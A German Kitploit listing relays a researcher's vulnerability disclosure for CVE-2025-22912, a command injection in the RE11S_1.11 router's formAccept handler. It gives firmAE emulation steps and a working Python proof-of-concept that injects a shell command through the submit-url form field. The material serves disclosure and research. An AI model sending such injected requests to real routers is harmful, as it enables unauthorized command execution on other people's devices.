Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/passwa11/re11s_1.11-formaccept-commandinjection
Embedded-System-SicherheitIoT-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationFuzzingPenetrationstestsCommand and Control

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
passwa11/re11s_1.11-formaccept-commandinjection

RE11S_1.11-formAccept-CommandInjection

CVE-2025-22912

Repository anzeigen
4vor 1 JahrNoch nicht geprüft

RE11S_1.11-formAccept-Befehlseinschleusung

Während meines Praktikums im Qi An Xin Tiangong Lab entdeckte ich eine Befehlseinschleusungsschwachstelle im Router RE11S_1.11.

Durch die Analyse der Webs-Datei im bin-Verzeichnis fand ich heraus, dass die Funktion formAccept eine Befehlseinschleusungsschwachstelle enthält.

Die Befehlseinschleusung kann durch den Wert des Schlüssels submit-url ausgelöst werden, was zu einer Systembefehlseinschleusung führt.

image-20241224100434040

Wie können wir einen Router simulieren

Verwenden Sie den folgenden Befehl, um mit firmAE zu simulieren.

root@kitploit:~
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin

Der Inhalt der poc.py-Datei ist wie folgt:

root@kitploit:~
import requests

url = "http://192.168.9.2/goform/formAccept"
data = {
	"submit-url":"touch /tmp/xyq"
}

r = requests.post(url,data=data)
print(r.text)

Angriffsergebnis

image-20241224100515030

Es ist ersichtlich, dass nach der Ausführung eine Datei /tmp/xyq hinzugefügt wird, was beweist, dass der Angriff erfolgreich ist.

Tool herunterladen